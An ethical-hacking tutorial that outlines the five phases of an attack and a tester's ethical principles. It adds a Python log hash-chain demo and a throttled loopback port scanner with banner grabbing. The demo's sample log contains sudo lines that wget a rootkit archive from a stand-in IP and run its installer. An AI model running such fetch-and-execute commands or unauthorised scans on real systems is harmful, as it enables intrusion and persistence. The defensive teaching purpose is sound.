1) Reconnaissance
2) Scanning and Enumeration
3) Gaining Access
4) Maintaining Access and Placing Backdoors
5) Clearing Tracks (Covering Tracks / Clearing Logs)
Phase I: Reconnaissance
• Reconnaissance is the pre-attack phase: a systematic attempt to locate, gather, identify, and record information about the target. The Hacker seeks to find out as much information as possible about the target, because everything learned here drives the later phases.
Phase II: Scanning and Enumeration
• Scanning and enumeration is the second pre-attack phase. It takes the information discovered during reconnaissance and uses it to examine the network directly. Scanning includes steps such as port scanning, which determines which ports are open and which services are listening on them; enumeration then pulls details (service banners, versions, account and share names) from those services. At this stage the attacker can also use automated vulnerability scanners to discover weaknesses in the systems found.
Phase III: Gaining Access
• This is the phase where the real hacking takes place. Vulnerabilities discovered during the reconnaissance and scanning phases are now exploited to gain access. The Hacker may deliver the exploit over a local area network, through local access to a PC, over the Internet, or offline. Gaining access is known in the Hacker world as owning the system. In a real security breach, this is the stage where the Hacker can use even simple techniques to cause irreparable damage to the target system.
Phase IV: Maintaining Access and Placing Backdoors
• Once a Hacker has gained access, they want to keep that access for future exploitation and attacks. Sometimes Hackers even harden the system against other Hackers or against security personnel, securing their exclusive access with backdoors, rootkits, and Trojans.
• The attacker can use automated scripts and tools to hide attack evidence and to create backdoors for further attacks.
Phase V: Clearing Tracks
• In this phase, once Hackers have gained and maintained access, they cover their tracks to avoid detection by security personnel, to continue using the owned system, to remove evidence of the hacking, or to avoid legal action. Many successful security breaches are never detected, including cases where firewalls and vigilant log checking were in place. Logs that exist only on the compromised host are the easiest to erase; copies forwarded to a separate collector survive this phase.
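As an added example (not code from the original page) of why forwarded, integrity-protected logs defeat this phase: each log line is hashed together with the previous line's digest, and the final digest (the "head") is kept by a separate collector. Deleting, editing, or truncating the local copy then breaks verification. The log lines, host names and IP addresses are constructed samples, and the hash-chain layout is an illustration rather than any particular product's format.

```python
import hashlib

GENESIS = "0" * 64  # fixed starting digest, known to both the host and the collector

# Constructed sample log: the kind of lines an intruder wants to erase.
SAMPLE_LOG = [
    "sshd[2211]: Accepted password for admin from 203.0.113.7 port 51522 ssh2",
    "sudo: admin : TTY=pts/0 ; COMMAND=/usr/bin/wget http://203.0.113.7/rk.tgz",
    "sudo: admin : TTY=pts/0 ; COMMAND=/bin/tar xzf rk.tgz -C /tmp",
    "sudo: admin : TTY=pts/0 ; COMMAND=/tmp/rk/install.sh",
    "sshd[2211]: Disconnected from 203.0.113.7 port 51522",
]


def _link(prev_digest, line):
    """Digest of this line bound to the digest of everything before it."""
    return hashlib.sha256((prev_digest + "\n" + line).encode("utf-8")).hexdigest()


def chain_logs(lines, start=GENESIS):
    """Attach to each line a digest that also covers the previous digest."""
    records, prev = [], start
    for line in lines:
        prev = _link(prev, line)
        records.append((line, prev))
    return records


def head(records, start=GENESIS):
    """Digest of the last record; the collector stores this value out of band."""
    return records[-1][1] if records else start


def verify_chain(records, expected_head, start=GENESIS):
    """Return (ok, index). ok is True only if every link checks out and the chain
    ends at expected_head; index is the first bad record, or None when intact."""
    prev = start
    for i, (line, digest) in enumerate(records):
        if digest != _link(prev, line):
            return False, i            # line edited, or earlier lines removed
        prev = digest
    if prev != expected_head:
        return False, len(records)     # records truncated from the end
    return True, None


def demo():
    """Run the chain against an intact log and three tampered copies."""
    original = chain_logs(SAMPLE_LOG)
    h = head(original)                                   # what the collector holds
    deleted_middle = original[:1] + original[4:]         # erase the three sudo lines
    truncated_tail = original[:-1]                       # drop only the last line
    edited = [(line.replace("203.0.113.7", "10.0.0.5"), d)  # rewrite the source IP
              for line, d in original]
    return {
        "intact": verify_chain(original, h),
        "deleted_middle": verify_chain(deleted_middle, h),
        "truncated_tail": verify_chain(truncated_tail, h),
        "edited": verify_chain(edited, h),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:15s} -> {result}")
```

The chain only helps if the head digest (or the whole forwarded stream) lives somewhere the intruder cannot reach from the owned host; a chain stored beside the log it protects can simply be regenerated after the lines are removed.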
Working of an Ethical Hacker
Obeying the Ethical Hacking Commandments:
• Every Ethical Hacker must follow a few basic principles. If they are not followed, bad things can happen. Most of the time these principles are ignored or forgotten when planning or executing ethical hacking tests, and the results can be very dangerous.
Working ethically:
• The word ethical can be defined as working with high professional morals and principles. Whether you're performing ethical hacking tests against your own systems or for someone who has hired you, everything you do as an Ethical Hacker must be approved in advance and must support the company's goals. No hidden agendas are allowed! Trustworthiness is the ultimate objective. Misuse of the information you gain is absolutely not allowed; that's what the bad guys do.
Respecting privacy:
• Treat the information you gather with complete respect. All information you obtain during your testing, from Web application log files to clear-text passwords, must be kept private.
Not crashing your systems:
• One of the biggest mistakes people make when testing their own systems is crashing them. The main reason is poor planning: the testers have not read the documentation, or they misunderstand the usage and power of the security tools and techniques.
• You can easily create miserable conditions on your systems while testing. Running too many tests too quickly against a system causes lockups. Many security assessment tools let you control how many tests (or connections) are run against a system at the same time, and these throttles are especially handy when you must run tests on production systems during regular business hours.
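The following is an added example, not code from the original page. It is a minimal TCP connect scanner with banner grabbing, covering both halves of Phase II (scanning finds open ports; enumeration pulls a service banner from them) and the throttle just described (max_parallel bounds how many probes run at once, so a production host is not flooded). It assumes only the Python standard library; the listener it starts on 127.0.0.1 and the banner it serves are constructed test fixtures, so it runs offline. Point it only at hosts you are authorised to test.

```python
import socket
import threading
from concurrent.futures import ThreadPoolExecutor


def start_listener(banner=b"SSH-2.0-ConstructedTestBanner\r\n"):
    """Constructed target: a loopback TCP service that greets each client with a banner."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))          # port 0: let the OS pick a free port
    srv.listen(16)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:             # server socket closed: stop serving
                return
            try:
                conn.sendall(banner)
            except OSError:             # client closed first (plain probe): ignore
                pass
            finally:
                conn.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]


def closed_port():
    """Pick a loopback port nothing is listening on: bind, read the number, release it."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def probe(host, port, timeout=0.5):
    """Connect scan: True when the TCP handshake completes, False on refusal/timeout."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            return True
        except OSError:                 # ConnectionRefusedError and timeout are OSErrors
            return False


def scan_ports(host, ports, max_parallel=8, timeout=0.5):
    """Return the sorted open ports, never running more than max_parallel probes at once.
    Lower max_parallel (and raise timeout) on fragile or production hosts."""
    with ThreadPoolExecutor(max_workers=max_parallel) as pool:
        results = list(pool.map(lambda p: (p, probe(host, p, timeout)), ports))
    return sorted(p for p, is_open in results if is_open)


def grab_banner(host, port, timeout=1.0):
    """Enumeration step: read whatever the service volunteers on connect."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            return s.recv(256).decode("ascii", "replace").strip()
        except OSError:
            return ""


def demo():
    """Scan one listening and one closed loopback port, then enumerate the open one."""
    srv, open_p = start_listener()
    closed_p = closed_port()
    try:
        found = scan_ports("127.0.0.1", [open_p, closed_p], max_parallel=2)
        banner = grab_banner("127.0.0.1", open_p) if found else ""
    finally:
        srv.close()
    return {"open_port": open_p, "closed_port": closed_p, "found": found, "banner": banner}


if __name__ == "__main__":
    print(demo())
```

A connect scan completes the handshake and so shows up in the target's connection logs; that is acceptable for an approved test, and the throttle keeps the noise and load within what the owner agreed to.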
Executing the plan:
• In ethical hacking, time and patience are important. Be careful when you're performing your tests: a Hacker already in your network, or an employee looking over your shoulder, may watch what's going on and use that information against you. It isn't practical to make sure that no Hackers are on your systems before you start, so just keep everything as quiet and private as possible.
• This is especially critical when transmitting and storing your test results. You're now on a reconnaissance mission: find as much information as possible about your organization and systems, which is exactly what malicious Hackers do. Start with a broad view and narrow your focus. Search the Internet for your organization's name, your computer and network system names, and your IP addresses. Google is a great place to start.
• Don't take ethical hacking too far, though. It makes little sense to harden your systems against unlikely attacks. For instance, if you don't have an internal Web server running, you may not need to worry much about Web server attacks. However, don't forget about insider threats from malicious employees, friends, or colleagues.